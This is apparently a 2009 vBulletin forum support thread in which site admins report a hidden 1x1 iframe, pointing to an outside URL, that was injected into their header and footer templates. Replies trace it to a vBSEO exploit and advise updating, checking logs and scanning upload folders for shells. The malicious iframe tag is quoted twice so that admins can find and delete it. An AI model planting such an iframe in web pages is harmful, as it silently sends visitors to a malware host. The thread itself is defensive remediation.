Announcement

Collapse
No announcement yet.

Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Iframe MYSQL Injection (http://centiyo.com/in.cgi?default)

    Hay some days ago i am facing Iframe problem. I change my database password. Disable all plugins (define('DISABLE_HOOKS', true); ) but still some one putting iframe on my forums, sometime i found this code in header and some time in footer.
    Code:
    <iframe width=1 height=1 border=0 frameborder=0 src=\\"http://centiyo.com/in.cgi?default\\"></iframe>
    . I also upgrade the forums version into vBulletin 3.8.4 Patch Level 1. I searched on google some other people also getting this problem. So please guide me what i need to do.

    Thanks

  • #2
    What about your FTP and Control Panel passwords?

    Are you on shared hosting or dedicated server?

    Are you using the default style or are have you got a customised style?
    Vote for:

    - *Admin Settable Paid Subscription Reminder Timeframe*
    -
    *PM - Add ability to reply to originator only*
    - Add Admin ability to auto-subscribe users to specific channel(s)
    - Highlight the correct navigation tab when you are on a custom page
    - "Quick Route" Interface...
    - Allow to use custom icons for individual forums

    Comment


    • #3
      I have dedicated server i also change the account user name and password. And using vb3bluesaint from vBulletinStyles .
      Originally posted by Trevster View Post
      What about your FTP and Control Panel passwords?

      Are you on shared hosting or dedicated server?

      Are you using the default style or are have you got a customised style?

      Comment


      • #4
        If these are continually appearing in your templates then check your server logs to see if there's anything there. It may be that a script is actually installed on the server to periodically inject this code into your database so also check with your host and see if there's anything that can be done from there end to search for this.

        Another option that may be worth considering is creating a new style from the XML file again and setting that as the default. Then, bin all the others. Users won't notice the difference in the style name as it will look exactly the same anyway.
        Vote for:

        - *Admin Settable Paid Subscription Reminder Timeframe*
        -
        *PM - Add ability to reply to originator only*
        - Add Admin ability to auto-subscribe users to specific channel(s)
        - Highlight the correct navigation tab when you are on a custom page
        - "Quick Route" Interface...
        - Allow to use custom icons for individual forums

        Comment


        • #5
          Facing the same problem myself this morning

          It's definitely a SQL Injection. How is the ultimate question.

          Comment


          • #6
            hey, I have the same problem,
            but in my case I was have this iframe in showthred.php too.
            It's strange becouse via "SQL Injection" it's impossibile to change file content, am I right ?

            ps. i was have iframe in "header" template
            my admin check apache logs and there wasn't "centiyo" pharse,
            so it's must be SQL Injection in POST
            Last edited by moshu; Thu 3 Dec '09, 8:39am.
            my counter strike forum :)
            and best cs portal :D

            Comment


            • #7
              I am also having this problem today, so far i have reuploaded the files, set the template to default, changed mysql password but i am still getting this problem.

              I am searching posts and templates for any changes as we speak
              Bluepearl Skins - vBulletin 4 & 5 Skins

              Comment


              • #8
                LADIES AND GENTLEMEN:

                IF YOU ARE HAVING VBSEO PLEASE UPDATE NOW!!
                an exploit has been released for it and alot of forums are getting struck.

                Comment


                • #9
                  my Musclesci vbseo has expired, will updating to 3.2.0 fix this problem?
                  Bluepearl Skins - vBulletin 4 & 5 Skins

                  Comment


                  • #10
                    I can confirm updating to the latest VBSEO (for me 3.2.0) fixed this problem

                    Also search all your templates for '<iframe width=1 height=1 border=0 frameborder=0 src="http://centiyo.com/in.cgi?default"></iframe>' and delete it.

                    I found this only in the header and footer templates.
                    Last edited by Sean James; Thu 3 Dec '09, 1:28pm.
                    Bluepearl Skins - vBulletin 4 & 5 Skins

                    Comment


                    • #11
                      hehe i knew it.. upgrade to 3.2.2 of vbseo

                      Comment


                      • #12
                        Hay today i upgrade the VBSEO to 3.3.2 and changed database password again. Let see

                        Comment


                        • #13
                          jamshed, scan all your customvatar, attachment, customprofilepics folder for any file with other extension than
                          .jpg|.gif|.attach|.jpeg.

                          they might have put a c99 shell on your server and can access it even if you fixed the vbseo vuln.

                          Comment


                          • #14
                            What do your server logs show?
                            It shouldn't be that hard to track down how the attacker is getting in
                            -- Web Developer for hire
                            ---Online Marketing Tools and Articles

                            Comment


                            • #15
                              Originally posted by kateido View Post
                              jamshed, scan all your customvatar, attachment, customprofilepics folder for any file with other extension than
                              .jpg|.gif|.attach|.jpeg.

                              they might have put a c99 shell on your server and can access it even if you fixed the vbseo vuln.
                              Found files in attachements called zaco.php and doit_js.php
                              Removed

                              Thanks kateido

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X